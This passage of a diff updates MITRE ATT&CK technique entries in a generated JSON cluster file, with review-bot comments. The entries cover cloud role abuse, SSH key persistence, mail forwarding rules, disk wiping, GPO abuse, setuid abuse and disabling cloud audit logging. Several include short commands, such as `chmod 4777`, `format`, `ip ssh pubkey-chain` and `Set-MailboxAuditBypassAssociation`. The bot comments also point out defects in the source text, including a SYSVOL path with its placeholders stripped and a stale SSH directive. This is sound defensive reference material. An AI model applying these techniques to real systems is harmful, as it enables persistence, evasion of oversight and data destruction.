"description": "An adversary may add additional roles or permissions to an adversary-controlled cloud account to maintain persistent access to a tenant. For example, adversaries may update IAM policies in cloud-based environments or add a new global administrator in Office 365 environments.(Citation: AWS IAM Policies and Permissions)(Citation: Google Cloud IAM Policies)(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: Microsoft O365 Admin Roles) With sufficient permissions, a compromised account can gain almost unlimited access to data and settings (including the ability to reset the passwords of other admins).(Citation: Expel AWS Attacker)\n(Citation: Microsoft O365 Admin Roles) \n\nThis account modification may immediately follow [Create Account](https://attack.mitre.org/techniques/T1136) or other malicious account activity. Adversaries may also modify existing [Valid Accounts](https://attack.mitre.org/techniques/T1078) that they have compromised. This could lead to privilege escalation, particularly if the roles added allow for lateral movement to additional accounts.\n\nFor example, in Azure AD environments, an adversary with the Application Administrator role can add [Additional Cloud Credentials](https://attack.mitre.org/techniques/T1098/001) to their application's service principal. In doing so the adversary would be able to gain the service principal’s roles and permissions, which may be different from those of the Application Administrator.(Citation: SpecterOps Azure Privilege Escalation) Similarly, in AWS environments, an adversary with appropriate permissions may be able to use the CreatePolicyVersion
API to define a new version of an IAM policy or the AttachUserPolicy
API to attach an IAM policy with additional or distinct permissions to a compromised user account.(Citation: Rhino Security Labs AWS Privilege Escalation)\n\nSimilarly, an adversary with the Azure AD Global Administrator role can toggle the “Access management for Azure resources” option to gain the ability to assign privileged access to Azure subscriptions and virtual machines to Azure AD users, including themselves.(Citation: Azure AD to AD) ",
"meta": {
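Review bot: the new T1036.008 cluster object is structurally complete (external_id, kill_chain, data sources, platforms, refs, a subtechnique-of relation to 42e8de7b-37b2-4258-905a-6897815e58e0, uuid and value), and the JPEG signature 0xFF 0xD8 given in the description is correct. Two upstream text defects are carried through: "Polygot files" (twice) should be "Polyglot", and "malicious malware" is redundant; since this file is generated from mitre/cti, file those there rather than patching here. Only the IcedID polyglot sentence is sourced (the unit42 URL, which matches refs); the JPEG header and test.gif examples carry no citation.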
@@ -9007,7 +9064,6 @@
],
"refs": [
"https://attack.mitre.org/techniques/T1550/004",
- "https://capec.mitre.org/data/definitions/60.html",
"https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/",
"https://wunderwuzzi23.github.io/blog/passthecookie.html"
]
@@ -9064,7 +9120,7 @@
"value": "Credential API Hooking - T1056.004"
},
{
- "description": "Adversaries may modify the SSH authorized_keys
file to maintain persistence on a victim host. Linux distributions and macOS commonly use key-based authentication to secure the authentication process of SSH sessions for remote management. The authorized_keys
file in SSH specifies the SSH keys that can be used for logging into the user account for which the file is configured. This file is usually found in the user's home directory under <user-home>/.ssh/authorized_keys
.(Citation: SSH Authorized Keys) Users may edit the system’s SSH config file to modify the directives PubkeyAuthentication and RSAAuthentication to the value “yes” to ensure public key and RSA authentication are enabled. The SSH config file is usually located under /etc/ssh/sshd_config
.\n\nAdversaries may modify SSH authorized_keys
files directly with scripts or shell commands to add their own adversary-supplied public keys. In cloud environments, adversaries may be able to modify the SSH authorized_keys file of a particular virtual machine via the command line interface or rest API. For example, by using the Google Cloud CLI’s “add-metadata” command an adversary may add SSH keys to a user account.(Citation: Google Cloud Add Metadata)(Citation: Google Cloud Privilege Escalation) Similarly, in Azure, an adversary may update the authorized_keys file of a virtual machine via a PATCH request to the API.(Citation: Azure Update Virtual Machines) This ensures that an adversary possessing the corresponding private key may log in as an existing user via SSH.(Citation: Venafi SSH Key Abuse)(Citation: Cybereason Linux Exim Worm)\n\nWhere authorized_keys files are modified via cloud APIs or command line interfaces, an adversary may achieve privilege escalation on the target virtual machine if they add a key to a higher-privileged user. ",
+ "description": "Adversaries may modify the SSH authorized_keys
file to maintain persistence on a victim host. Linux distributions and macOS commonly use key-based authentication to secure the authentication process of SSH sessions for remote management. The authorized_keys
file in SSH specifies the SSH keys that can be used for logging into the user account for which the file is configured. This file is usually found in the user's home directory under <user-home>/.ssh/authorized_keys
.(Citation: SSH Authorized Keys) Users may edit the system’s SSH config file to modify the directives PubkeyAuthentication and RSAAuthentication to the value “yes” to ensure public key and RSA authentication are enabled. The SSH config file is usually located under /etc/ssh/sshd_config
.\n\nAdversaries may modify SSH authorized_keys
files directly with scripts or shell commands to add their own adversary-supplied public keys. In cloud environments, adversaries may be able to modify the SSH authorized_keys file of a particular virtual machine via the command line interface or rest API. For example, by using the Google Cloud CLI’s “add-metadata” command an adversary may add SSH keys to a user account.(Citation: Google Cloud Add Metadata)(Citation: Google Cloud Privilege Escalation) Similarly, in Azure, an adversary may update the authorized_keys file of a virtual machine via a PATCH request to the API.(Citation: Azure Update Virtual Machines) This ensures that an adversary possessing the corresponding private key may log in as an existing user via SSH.(Citation: Venafi SSH Key Abuse)(Citation: Cybereason Linux Exim Worm) \n\nWhere authorized_keys files are modified via cloud APIs or command line interfaces, an adversary may achieve privilege escalation on the target virtual machine if they add a key to a higher-privileged user. \n\nSSH keys can also be added to accounts on network devices, such as with the `ip ssh pubkey-chain` [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) command.(Citation: cisco_ip_ssh_pubkey_ch_cmd)",
"meta": {
"external_id": "T1098.004",
"kill_chain": [
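Review bot: the added sentence on network devices (`ip ssh pubkey-chain`) depends on the "Network" platform and the cisco.com ref added in the next hunk, so keep the two hunks together. While this description is being touched, two pre-existing points are worth raising upstream: "RSAAuthentication" is a protocol-1 sshd_config directive that current OpenSSH no longer honours, so advising a value of "yes" for it alongside PubkeyAuthentication is stale; and "rest API" should read "REST API".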
@@ -9078,13 +9134,15 @@
"mitre_platforms": [
"Linux",
"macOS",
- "IaaS"
+ "IaaS",
+ "Network"
],
"refs": [
"https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/",
"https://attack.mitre.org/techniques/T1098/004",
"https://cloud.google.com/sdk/gcloud/reference/compute/instances/add-metadata",
"https://docs.microsoft.com/en-us/rest/api/compute/virtual-machines/update",
+ "https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/security/d1/sec-d1-cr-book/sec-cr-i3.html#wp1254331478",
"https://www.cybereason.com/blog/new-pervasive-worm-exploiting-linux-exim-server-vulnerability",
"https://www.ssh.com/ssh/authorized_keys/",
"https://www.venafi.com/blog/growing-abuse-ssh-keys-commodity-malware-campaigns-now-equipped-ssh-capabilities"
@@ -9345,14 +9403,15 @@
"value": "Compiled HTML File - T1218.001"
},
{
- "description": "Adversaries may setup email forwarding rules to collect sensitive information. Adversaries may abuse email-forwarding rules to monitor the activities of a victim, steal information, and further gain intelligence on the victim or the victim’s organization to use as part of further exploits or operations.(Citation: US-CERT TA18-068A 2018) Furthermore, email forwarding rules can allow adversaries to maintain persistent access to victim's emails even after compromised credentials are reset by administrators.(Citation: Pfammatter - Hidden Inbox Rules) Most email clients allow users to create inbox rules for various email functions, including forwarding to a different recipient. These rules may be created through a local email application, a web interface, or by command-line interface. Messages can be forwarded to internal or external recipients, and there are no restrictions limiting the extent of this rule. Administrators may also create forwarding rules for user accounts with the same considerations and outcomes.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2)(Citation: Mac Forwarding Rules)\n\nAny user or administrator within the organization (or adversary with valid credentials) can create rules to automatically forward all received messages to another recipient, forward emails to different locations based on the sender, and more. Adversaries may also hide the rule by making use of the Microsoft Messaging API (MAPI) to modify the rule properties, making it hidden and not visible from Outlook, OWA or most Exchange Administration tools.(Citation: Pfammatter - Hidden Inbox Rules)",
+ "description": "Adversaries may setup email forwarding rules to collect sensitive information. Adversaries may abuse email forwarding rules to monitor the activities of a victim, steal information, and further gain intelligence on the victim or the victim’s organization to use as part of further exploits or operations.(Citation: US-CERT TA18-068A 2018) Furthermore, email forwarding rules can allow adversaries to maintain persistent access to victim's emails even after compromised credentials are reset by administrators.(Citation: Pfammatter - Hidden Inbox Rules) Most email clients allow users to create inbox rules for various email functions, including forwarding to a different recipient. These rules may be created through a local email application, a web interface, or by command-line interface. Messages can be forwarded to internal or external recipients, and there are no restrictions limiting the extent of this rule. Administrators may also create forwarding rules for user accounts with the same considerations and outcomes.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2)(Citation: Mac Forwarding Rules)\n\nAny user or administrator within the organization (or adversary with valid credentials) can create rules to automatically forward all received messages to another recipient, forward emails to different locations based on the sender, and more. Adversaries may also hide the rule by making use of the Microsoft Messaging API (MAPI) to modify the rule properties, making it hidden and not visible from Outlook, OWA or most Exchange Administration tools.(Citation: Pfammatter - Hidden Inbox Rules)\n\nIn some environments, administrators may be able to enable email forwarding rules that operate organization-wide rather than on individual inboxes. 
For example, Microsoft Exchange supports transport rules that evaluate all mail an organization receives against user-specified conditions, then performs a user-specified action on mail that adheres to those conditions.(Citation: Microsoft Mail Flow Rules 2023) Adversaries that abuse such features may be able to enable forwarding on all or specific mail an organization receives. ",
"meta": {
"external_id": "T1114.003",
"kill_chain": [
"mitre-attack:collection"
],
"mitre_data_sources": [
- "Application Log: Application Log Content"
+ "Application Log: Application Log Content",
+ "Command: Command Execution"
],
"mitre_platforms": [
"Office 365",
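Review bot: the new description value ends with a stray space before the closing quote (`...all or specific mail an organization receives. ",`), and the replacement text is shown broken across two lines between `on individual inboxes. ` and `For example, Microsoft Exchange`; every other paragraph break in this string is encoded as `\n\n`, so please confirm this is only display wrapping and not a literal newline inside the JSON string, which would make the cluster file unparseable. The opening sentence also still reads "Adversaries may setup email forwarding rules" ("set up"); since this text is synced from mitre/cti it should be fixed upstream rather than hand-edited here, otherwise the next regeneration reverts it.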
@@ -9365,6 +9424,7 @@
"https://attack.mitre.org/techniques/T1114/003",
"https://blog.compass-security.com/2018/09/hidden-inbox-rules-in-microsoft-exchange/",
"https://blogs.technet.microsoft.com/timmcmic/2015/06/08/exchange-and-office-365-mail-forwarding-2/",
+ "https://learn.microsoft.com/en-us/exchange/security-and-compliance/mail-flow-rules/mail-flow-rules",
"https://support.apple.com/guide/mail/reply-to-forward-or-redirect-emails-mlhlp1010/mac",
"https://www.us-cert.gov/ncas/alerts/TA18-086A"
]
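Review bot: the added `learn.microsoft.com/.../mail-flow-rules` entry matches the new `(Citation: Microsoft Mail Flow Rules 2023)` in the description, which is good, but while touching this refs list note the pre-existing mismatch between the citation key `US-CERT TA18-068A 2018` in the description and the URL `https://www.us-cert.gov/ncas/alerts/TA18-086A` here; the alert number in the URL is the one that resolves, so the citation key looks like an upstream transposition worth reporting to mitre/cti.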
@@ -9555,7 +9615,7 @@
"value": "Security Software Discovery - T1418.001"
},
{
- "description": "Adversaries may erase the contents of storage devices on specific systems or in large numbers in a network to interrupt availability to system and network resources.\n\nAdversaries may partially or completely overwrite the contents of a storage device rendering the data irrecoverable through the storage interface.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware)(Citation: DOJ Lazarus Sony 2018) Instead of wiping specific disk structures or files, adversaries with destructive intent may wipe arbitrary portions of disk content. To wipe disk content, adversaries may acquire direct access to the hard drive in order to overwrite arbitrarily sized portions of disk with random data.(Citation: Novetta Blockbuster Destructive Malware) Adversaries have been observed leveraging third-party drivers like [RawDisk](https://attack.mitre.org/software/S0364) to directly access disk content.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware) This behavior is distinct from [Data Destruction](https://attack.mitre.org/techniques/T1485) because sections of the disk are erased instead of individual files.\n\nTo maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware used for wiping disk content may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Novetta Blockbuster Destructive Malware)",
+ "description": "Adversaries may erase the contents of storage devices on specific systems or in large numbers in a network to interrupt availability to system and network resources.\n\nAdversaries may partially or completely overwrite the contents of a storage device rendering the data irrecoverable through the storage interface.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware)(Citation: DOJ Lazarus Sony 2018) Instead of wiping specific disk structures or files, adversaries with destructive intent may wipe arbitrary portions of disk content. To wipe disk content, adversaries may acquire direct access to the hard drive in order to overwrite arbitrarily sized portions of disk with random data.(Citation: Novetta Blockbuster Destructive Malware) Adversaries have also been observed leveraging third-party drivers like [RawDisk](https://attack.mitre.org/software/S0364) to directly access disk content.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware) This behavior is distinct from [Data Destruction](https://attack.mitre.org/techniques/T1485) because sections of the disk are erased instead of individual files.\n\nTo maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware used for wiping disk content may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Novetta Blockbuster Destructive Malware)",
"meta": {
"external_id": "T1561.001",
"kill_chain": [
@@ -9616,7 +9676,6 @@
],
"refs": [
"https://attack.mitre.org/techniques/T1518/001",
- "https://capec.mitre.org/data/definitions/581.html",
"https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeSecurityGroups.html",
"https://expel.io/blog/finding-evil-in-aws/"
]
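Review bot: this hunk, and the equivalent hunks below for T1552.001, T1498.001, T1499.001, T1499.002, T1553.004, T1566.003, T1547.004 and T1574.006, silently drop every `https://capec.mitre.org/data/definitions/*.html` entry from `refs`. If that follows the upstream mitre/cti change it is fine, but the commit message should say so explicitly, because downstream consumers that built CAPEC cross-references from these `refs` will lose them without any other signal in the cluster data.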
@@ -9713,7 +9772,6 @@
"http://blogs.technet.com/b/srd/archive/2014/05/13/ms14-025-an-update-for-group-policy-preferences.aspx",
"http://carnal0wnage.attackresearch.com/2014/05/mimikatz-against-virtual-machine-memory.html",
"https://attack.mitre.org/techniques/T1552/001",
- "https://capec.mitre.org/data/definitions/639.html",
"https://posts.specterops.io/head-in-the-clouds-bd038bb69e48",
"https://unit42.paloaltonetworks.com/attackers-tactics-and-techniques-in-unsecured-docker-daemons-revealed/",
"https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/"
@@ -9729,7 +9787,7 @@
"value": "Credentials In Files - T1552.001"
},
{
- "description": "Adversaries may corrupt or wipe the disk data structures on a hard drive necessary to boot a system; targeting specific critical systems or in large numbers in a network to interrupt availability to system and network resources. \n\nAdversaries may attempt to render the system unable to boot by overwriting critical data located in structures such as the master boot record (MBR) or partition table.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018) The data contained in disk structures may include the initial executable code for loading an operating system or the location of the file system partitions on disk. If this information is not present, the computer will not be able to load an operating system during the boot process, leaving the computer unavailable. [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) may be performed in isolation, or along with [Disk Content Wipe](https://attack.mitre.org/techniques/T1561/001) if all sectors of a disk are wiped.\n\nTo maximize impact on the target organization, malware designed for destroying disk structures may have worm-like features to propagate across a network by leveraging other techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)",
+ "description": "Adversaries may corrupt or wipe the disk data structures on a hard drive necessary to boot a system; targeting specific critical systems or in large numbers in a network to interrupt availability to system and network resources. \n\nAdversaries may attempt to render the system unable to boot by overwriting critical data located in structures such as the master boot record (MBR) or partition table.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018) The data contained in disk structures may include the initial executable code for loading an operating system or the location of the file system partitions on disk. If this information is not present, the computer will not be able to load an operating system during the boot process, leaving the computer unavailable. [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) may be performed in isolation, or along with [Disk Content Wipe](https://attack.mitre.org/techniques/T1561/001) if all sectors of a disk are wiped.\n\nOn a network devices, adversaries may reformat the file system using [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `format`.(Citation: format_cmd_cisco)\n\nTo maximize impact on the target organization, malware designed for destroying disk structures may have worm-like features to propagate across a network by leveraging other techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)",
"meta": {
"external_id": "T1561.002",
"kill_chain": [
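Review bot: the new paragraph contains a grammatical error, "On a network devices, adversaries may reformat the file system", which should read "On network devices". The citation key `(Citation: format_cmd_cisco)` also uses a snake_case style unlike every other key in this file (`Symantec Shamoon 2012`, `Kaspersky StoneDrill 2017`); both come from upstream, so flag them there rather than patching the generated JSON.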
@@ -9745,7 +9803,8 @@
"mitre_platforms": [
"Linux",
"macOS",
- "Windows"
+ "Windows",
+ "Network"
],
"refs": [
"http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/",
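Review bot: `"Network"` is appended after `"Windows"` while the existing entries are in alphabetical order (`Linux`, `macOS`, `Windows`). If the generator preserves upstream order this is expected, but a sorted platform list would keep future diffs smaller.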
@@ -9753,6 +9812,7 @@
"https://docs.microsoft.com/sysinternals/downloads/sysmon",
"https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180722/Report_Shamoon_StoneDrill_final.pdf",
"https://unit42.paloaltonetworks.com/shamoon-3-targets-oil-gas-organization/",
+ "https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/fundamentals/command/cf_command_ref/F_through_K.html#wp2829794668",
"https://www.fireeye.com/blog/threat-research/2016/11/fireeye_respondsto.html",
"https://www.symantec.com/connect/blogs/shamoon-attacks"
]
@@ -9961,7 +10021,7 @@
"value": "Domain Generation Algorithms - T1637.001"
},
{
- "description": "Adversaries may modify Group Policy Objects (GPOs) to subvert the intended discretionary access controls for a domain, usually with the intention of escalating privileges on the domain. Group policy allows for centralized management of user and computer settings in Active Directory (AD). GPOs are containers for group policy settings made up of files stored within a predicable network path \\\\<DOMAIN>\\SYSVOL\\<DOMAIN>\\Policies\\
.(Citation: TechNet Group Policy Basics)(Citation: ADSecurity GPO Persistence 2016) \n\nLike other objects in AD, GPOs have access controls associated with them. By default all user accounts in the domain have permission to read GPOs. It is possible to delegate GPO access control permissions, e.g. write access, to specific users or groups in the domain.\n\nMalicious GPO modifications can be used to implement many other malicious behaviors such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001), [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105), [Create Account](https://attack.mitre.org/techniques/T1136), [Service Execution](https://attack.mitre.org/techniques/T1569/002), and more.(Citation: ADSecurity GPO Persistence 2016)(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions)(Citation: Mandiant M Trends 2016)(Citation: Microsoft Hacking Team Breach) Since GPOs can control so many user and machine settings in the AD environment, there are a great number of potential attacks that can stem from this GPO abuse.(Citation: Wald0 Guide to GPOs)\n\nFor example, publicly available scripts such as New-GPOImmediateTask
can be leveraged to automate the creation of a malicious [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053) by modifying GPO settings, in this case modifying <GPO_PATH>\\Machine\\Preferences\\ScheduledTasks\\ScheduledTasks.xml
.(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions) In some cases an adversary might modify specific user rights like SeEnableDelegationPrivilege, set in <GPO_PATH>\\MACHINE\\Microsoft\\Windows NT\\SecEdit\\GptTmpl.inf
, to achieve a subtle AD backdoor with complete control of the domain because the user account under the adversary's control would then be able to modify GPOs.(Citation: Harmj0y SeEnableDelegationPrivilege Right)",
+ "description": "Adversaries may modify Group Policy Objects (GPOs) to subvert the intended discretionary access controls for a domain, usually with the intention of escalating privileges on the domain. Group policy allows for centralized management of user and computer settings in Active Directory (AD). GPOs are containers for group policy settings made up of files stored within a predictable network path `\\\\SYSVOL\\\\Policies\\`.(Citation: TechNet Group Policy Basics)(Citation: ADSecurity GPO Persistence 2016) \n\nLike other objects in AD, GPOs have access controls associated with them. By default all user accounts in the domain have permission to read GPOs. It is possible to delegate GPO access control permissions, e.g. write access, to specific users or groups in the domain.\n\nMalicious GPO modifications can be used to implement many other malicious behaviors such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001), [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105), [Create Account](https://attack.mitre.org/techniques/T1136), [Service Execution](https://attack.mitre.org/techniques/T1569/002), and more.(Citation: ADSecurity GPO Persistence 2016)(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions)(Citation: Mandiant M Trends 2016)(Citation: Microsoft Hacking Team Breach) Since GPOs can control so many user and machine settings in the AD environment, there are a great number of potential attacks that can stem from this GPO abuse.(Citation: Wald0 Guide to GPOs)\n\nFor example, publicly available scripts such as New-GPOImmediateTask
can be leveraged to automate the creation of a malicious [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053) by modifying GPO settings, in this case modifying <GPO_PATH>\\Machine\\Preferences\\ScheduledTasks\\ScheduledTasks.xml
.(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions) In some cases an adversary might modify specific user rights like SeEnableDelegationPrivilege, set in <GPO_PATH>\\MACHINE\\Microsoft\\Windows NT\\SecEdit\\GptTmpl.inf
, to achieve a subtle AD backdoor with complete control of the domain because the user account under the adversary's control would then be able to modify GPOs.(Citation: Harmj0y SeEnableDelegationPrivilege Right)",
"meta": {
"external_id": "T1484.001",
"kill_chain": [
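Review bot: the SYSVOL path in the new description has lost its placeholders. The old text read `\\\\<DOMAIN>\\SYSVOL\\<DOMAIN>\\Policies\\`, the new text reads `` `\\\\SYSVOL\\\\Policies\\` ``, which is not a valid GPO location; the `<DOMAIN>` tokens were evidently stripped as HTML tags, while `<GPO_PATH>` later in the same string survived. Please restore `\\\\<DOMAIN>\\SYSVOL\\<DOMAIN>\\Policies\\` (escaped as `&lt;DOMAIN&gt;` if the renderer is the problem). The `predicable` to `predictable` fix in the same hunk is correct.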
@@ -10030,7 +10090,7 @@
"value": "Process Argument Spoofing - T1564.010"
},
{
- "description": "An adversary may abuse configurations where an application has the setuid or setgid bits set in order to get code running in a different (and possibly more privileged) user’s context. On Linux or macOS, when the setuid or setgid bits are set for an application binary, the application will run with the privileges of the owning user or group respectively.(Citation: setuid man page) Normally an application is run in the current user’s context, regardless of which user or group owns the application. However, there are instances where programs need to be executed in an elevated context to function properly, but the user running them may not have the specific required privileges.\n\nInstead of creating an entry in the sudoers file, which must be done by root, any user can specify the setuid or setgid flag to be set for their own applications (i.e. [Linux and Mac File and Directory Permissions Modification](https://attack.mitre.org/techniques/T1222/002)). The chmod
command can set these bits with bitmasking, chmod 4777 [file]
or via shorthand naming, chmod u+s [file]
. This will enable the setuid bit. To enable the setgit bit, chmod 2775
and chmod g+s
can be used.\n\nAdversaries can use this mechanism on their own malware to make sure they're able to execute in elevated contexts in the future.(Citation: OSX Keydnap malware) This abuse is often part of a \"shell escape\" or other actions to bypass an execution environment with restricted permissions.\n\nAlternatively, adversaries may choose to find and target vulnerable binaries with the setuid or setgid bits already enabled (i.e. [File and Directory Discovery](https://attack.mitre.org/techniques/T1083)). The setuid and setguid bits are indicated with an \"s\" instead of an \"x\" when viewing a file's attributes via ls -l
. The find
command can also be used to search for such files. For example, find / -perm +4000 2>/dev/null
can be used to find files with setuid set and find / -perm +2000 2>/dev/null
may be used for setgid. Binaries that have these bits set may then be abused by adversaries.(Citation: GTFOBins Suid)",
+ "description": "An adversary may abuse configurations where an application has the setuid or setgid bits set in order to get code running in a different (and possibly more privileged) user’s context. On Linux or macOS, when the setuid or setgid bits are set for an application binary, the application will run with the privileges of the owning user or group respectively.(Citation: setuid man page) Normally an application is run in the current user’s context, regardless of which user or group owns the application. However, there are instances where programs need to be executed in an elevated context to function properly, but the user running them may not have the specific required privileges.\n\nInstead of creating an entry in the sudoers file, which must be done by root, any user can specify the setuid or setgid flag to be set for their own applications (i.e. [Linux and Mac File and Directory Permissions Modification](https://attack.mitre.org/techniques/T1222/002)). The chmod
command can set these bits with bitmasking, chmod 4777 [file]
or via shorthand naming, chmod u+s [file]
. This will enable the setuid bit. To enable the setgid bit, chmod 2775
and chmod g+s
can be used.\n\nAdversaries can use this mechanism on their own malware to make sure they're able to execute in elevated contexts in the future.(Citation: OSX Keydnap malware) This abuse is often part of a \"shell escape\" or other actions to bypass an execution environment with restricted permissions.\n\nAlternatively, adversaries may choose to find and target vulnerable binaries with the setuid or setgid bits already enabled (i.e. [File and Directory Discovery](https://attack.mitre.org/techniques/T1083)). The setuid and setguid bits are indicated with an \"s\" instead of an \"x\" when viewing a file's attributes via ls -l
. The find
command can also be used to search for such files. For example, find / -perm +4000 2>/dev/null
can be used to find files with setuid set and find / -perm +2000 2>/dev/null
may be used for setgid. Binaries that have these bits set may then be abused by adversaries.(Citation: GTFOBins Suid)",
"meta": {
"external_id": "T1548.001",
"kill_chain": [
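Review bot: the `setgit` to `setgid` correction is good, but the same description still says `The setuid and setguid bits are indicated with an "s"` in the `ls -l` paragraph; `setguid` should be `setgid` as well, and since the whole value is being replaced anyway this is the moment to fix it (or report it upstream so it sticks).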
@@ -10085,8 +10145,6 @@
],
"refs": [
"https://attack.mitre.org/techniques/T1498/001",
- "https://capec.mitre.org/data/definitions/125.html",
- "https://capec.mitre.org/data/definitions/486.html",
"https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf",
"https://www.justice.gov/opa/pr/seven-iranians-working-islamic-revolutionary-guard-corps-affiliated-entities-charged"
]
@@ -10119,8 +10177,6 @@
],
"refs": [
"https://attack.mitre.org/techniques/T1499/001",
- "https://capec.mitre.org/data/definitions/469.html",
- "https://capec.mitre.org/data/definitions/482.html",
"https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf",
"https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf",
"https://www.cloudflare.com/learning/ddos/syn-flood-ddos-attack/",
@@ -10466,9 +10522,6 @@
],
"refs": [
"https://attack.mitre.org/techniques/T1499/002",
- "https://capec.mitre.org/data/definitions/488.html",
- "https://capec.mitre.org/data/definitions/489.html",
- "https://capec.mitre.org/data/definitions/528.html",
"https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf",
"https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf",
"https://www.cloudflare.com/learning/ddos/http-flood-ddos-attack/",
@@ -10690,7 +10743,7 @@
"value": "Domain Generation Algorithms - T1568.002"
},
{
- "description": "An adversary may disable cloud logging capabilities and integrations to limit what data is collected on their activities and avoid detection. \n\nCloud environments allow for collection and analysis of audit and application logs that provide insight into what activities a user does within the environment. If an adversary has sufficient permissions, they can disable logging to avoid detection of their activities. For example, in AWS an adversary may disable CloudWatch/CloudTrail integrations prior to conducting further malicious activity.(Citation: Following the CloudTrail: Generating strong AWS security signals with Sumo Logic)",
+ "description": "An adversary may disable cloud logging capabilities and integrations to limit what data is collected on their activities and avoid detection. Cloud environments allow for collection and analysis of audit and application logs that provide insight into what activities a user does within the environment. If an adversary has sufficient permissions, they can disable logging to avoid detection of their activities.\n\nFor example, in AWS an adversary may disable CloudWatch/CloudTrail integrations prior to conducting further malicious activity.(Citation: Following the CloudTrail: Generating strong AWS security signals with Sumo Logic) In Office 365, an adversary may disable logging on mail collection activities for specific users by using the `Set-MailboxAuditBypassAssociation` cmdlet, by disabling M365 Advanced Auditing for the user, or by downgrading the user’s license from an Enterprise E5 to an Enterprise E3 license.(Citation: Dark Reading Microsoft 365 Attacks 2021)",
"meta": {
"external_id": "T1562.008",
"kill_chain": [
@@ -10698,17 +10751,23 @@
],
"mitre_data_sources": [
"Cloud Service: Cloud Service Disable",
- "Cloud Service: Cloud Service Modification"
+ "Cloud Service: Cloud Service Modification",
+ "User Account: User Account Modification"
],
"mitre_platforms": [
- "IaaS"
+ "IaaS",
+ "SaaS",
+ "Google Workspace",
+ "Azure AD",
+ "Office 365"
],
"refs": [
"https://attack.mitre.org/techniques/T1562/008",
"https://cloud.google.com/logging/docs/audit/configure-data-access",
"https://docs.aws.amazon.com/awscloudtrail/latest/userguide/stop-cloudtrail-from-sending-events-to-cloudwatch-logs.html",
"https://docs.microsoft.com/en-us/cli/azure/monitor/diagnostic-settings?view=azure-cli-latest#az_monitor_diagnostic_settings_delete",
- "https://expel.io/blog/following-cloudtrail-generating-aws-security-signals-sumo-logic/"
+ "https://expel.io/blog/following-cloudtrail-generating-aws-security-signals-sumo-logic/",
+ "https://www.darkreading.com/threat-intelligence/incident-responders-explore-microsoft-365-attacks-in-the-wild/d/d-id/1341591"
]
},
"related": [
